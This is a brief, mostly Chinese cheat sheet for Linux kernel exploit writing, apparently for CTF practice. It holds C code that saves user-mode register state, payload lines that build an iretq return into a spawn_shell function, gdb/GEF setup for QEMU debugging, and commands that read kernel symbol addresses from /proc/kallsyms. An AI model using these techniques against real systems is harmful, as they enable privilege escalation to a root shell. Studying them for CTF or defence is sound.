kernel exp cheatsheet

EXP 编写

保存状态

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>

// -masm=intel
size_t user_cs, user_ss, user_rflags, user_sp;

void saveStatus()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    printf("\033[34m\033[1m[*] Status has been saved.\033[0m\n");
}

// 设置 iretq 参数
payload[++i] = (unsigned long)spawn_shell; // userland rip
payload[++i] = user_cs;
payload[++i] = user_rflags;
payload[++i] = user_sp;
payload[++i] = user_ss;

gdb 技巧

gdbscript

gdbscript
init-gef
gef-remote localhost 1234
pi reset_architecture("X86")
add-symbol-file vmlinux  # 如果开了 KASLR 要设置基址
# add-symbol-file fs/vuln.ko addr

获取基址

qemu-terminal
lsmod  # 获取 module 基址
grep "_text" | cat /proc/kallsyms  # 获取 kernel 基址
grep "cred" | cat /proc/kallsyms  # 获取 kernel 特定函数地址

gadget 技巧

带符号表解压工具：marin-m/vmlinux-to-elf

vmlinux base: 0xffffffff81000000

EXP 编写​

保存状态​

gdb 技巧​

gdbscript​

获取基址​

gadget 技巧​

EXP 编写

保存状态

gdb 技巧

gdbscript

获取基址

gadget 技巧